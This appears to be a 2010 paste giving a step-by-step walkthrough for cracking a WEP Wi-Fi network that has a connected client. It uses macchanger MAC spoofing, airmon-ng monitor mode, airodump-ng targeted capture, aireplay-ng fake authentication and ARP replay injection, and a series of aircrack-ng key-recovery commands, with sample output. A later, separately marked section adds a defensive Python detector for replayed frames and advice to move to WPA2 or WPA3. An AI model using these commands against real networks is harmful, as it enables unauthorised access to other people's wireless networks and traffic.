ak47suk1

wep with client

Sep 28th, 2010
Cracking a WEP-encrypted network with at least one client connected (aireplay -3):

-----------------------------------------------------------------------------

(1) Spoof the wireless card's MAC address
(2) Put the wireless card into monitor mode
(3) Scan for the target AP using airodump-ng
(4) Fake authentication using aireplay-ng option -1
(5) Packet injection, i.e. interactive frame selection, using aireplay-ng option -3
(6) Find the WEP key using aircrack-ng
------------------------------------------------------------------------------
(1) Spoof our wireless card's MAC address:
ifconfig ath0 down
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0

My output is:
Current MAC: <my mac> (unknown)
Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)

(2) Put the wireless card into monitor mode:
ifconfig wifi0 up
ifconfig ath0 down
airmon-ng start wifi0

My output is:
...
Interface   Chipset     Driver

wifi0       Atheros     madwifi-ng
ath0        Atheros     madwifi-ng VAP (parent: wifi0)
ath1        Atheros     madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

(3) Scan for the target AP using airodump-ng:

airodump-ng ath1

Press Ctrl+C to quit, then note the channel and copy the BSSID (the AP's MAC address):

airodump-ng -c <channel> -w <output> --bssid <APmac> ath1

(Here we focus on a specific AP so that we filter out any possible interference from other APs on the same channel,
and hence reduce the chance of a failed authentication/association or a failed attack.)

Other commands that can be used:

airodump-ng -w <output> --ivs -c <channel> ath1

(4) Fake authentication using aireplay-ng option -1:

aireplay-ng -1 0 -e <APname> -a <APmac> -h <yourmac> ath1

Another command that can be used:
aireplay-ng -1 6000 -o 1 -q 10 -e <APname> -a <APmac> -h <yourmac> ath1

(5) Packet injection, i.e. interactive frame selection, using aireplay-ng option -3:

aireplay-ng -3 -b <APmac> -h <yourmac/client> ath1

(6) Find the WEP key using aircrack-ng:

aircrack-ng <output>*.cap
or
aircrack-ng -P 1 <output>*.cap
aircrack-ng -z <output>*.cap
aircrack-ng -P 1 [-b <APmac>] <output>*.cap
aircrack-ng -z [-b <APmac>] <output>*.cap
aircrack-ng -n 64 -z -f 1 -e <APname> -b <APmac> <output>*.cap

aircrack-ng -n 128 <output>*.cap

aircrack-ng -a 1 -b <APmac> <output>

And be patient.
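
Seen from the monitoring side, the injection in step (5) shows up as one encrypted frame re-sent in bursts: the same transmitter, the same WEP IV and the same length, many times per second. The detector below is an added example, not part of the original paste; the record layout, the window and the threshold are assumptions, and the sample frames are constructed.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

def find_replayed_frames(frames, window=1.0, threshold=20):
    """Return [(transmitter, iv, peak_count)] for WEP frames re-sent in bursts.

    frames: iterable of (timestamp_s, transmitter, destination, iv_hex, length).
    A station normally picks a new IV per frame, so one (transmitter, IV, length)
    tuple seen `threshold` times within `window` seconds points to re-injection
    rather than link-layer retries. Both limits are assumed tuning values.
    """
    seen = defaultdict(list)
    for ts, tx, dst, iv, length in frames:
        if dst.lower() == BROADCAST:          # ARP requests are broadcast
            seen[(tx.lower(), iv.lower(), length)].append(ts)

    findings = []
    for (tx, iv, _length), stamps in seen.items():
        stamps.sort()
        peak, start = 0, 0
        for end, ts in enumerate(stamps):     # sliding window over timestamps
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            findings.append((tx, iv, peak))
    return sorted(findings)

def sample_capture():
    """Constructed frame records, not taken from a real capture."""
    frames = []
    # Normal client: every frame has a fresh IV, a few are broadcast.
    for i in range(40):
        dst = BROADCAST if i % 10 == 0 else "00:aa:bb:cc:dd:01"
        frames.append((i * 0.05, "00:aa:bb:cc:dd:02", dst, f"{i:06x}", 120))
    # Re-injected frame: identical IV and length, 200 copies in 0.4 s.
    for i in range(200):
        frames.append((1.0 + i * 0.002, "00:11:22:33:44:55", BROADCAST, "a1b2c3", 68))
    # Link-layer retries: same IV repeated only a handful of times.
    for i in range(4):
        frames.append((2.0 + i * 0.001, "00:aa:bb:cc:dd:03", BROADCAST, "0000ff", 68))
    return frames

if __name__ == "__main__":
    for tx, iv, peak in find_replayed_frames(sample_capture()):
        print(f"possible replay: {tx} reused IV {iv} {peak}x within 1 s")
```

A hit from this check on a network still running WEP is a reason to move it to WPA2 or WPA3, since the key recovery in step (6) only needs the traffic that the replay generates.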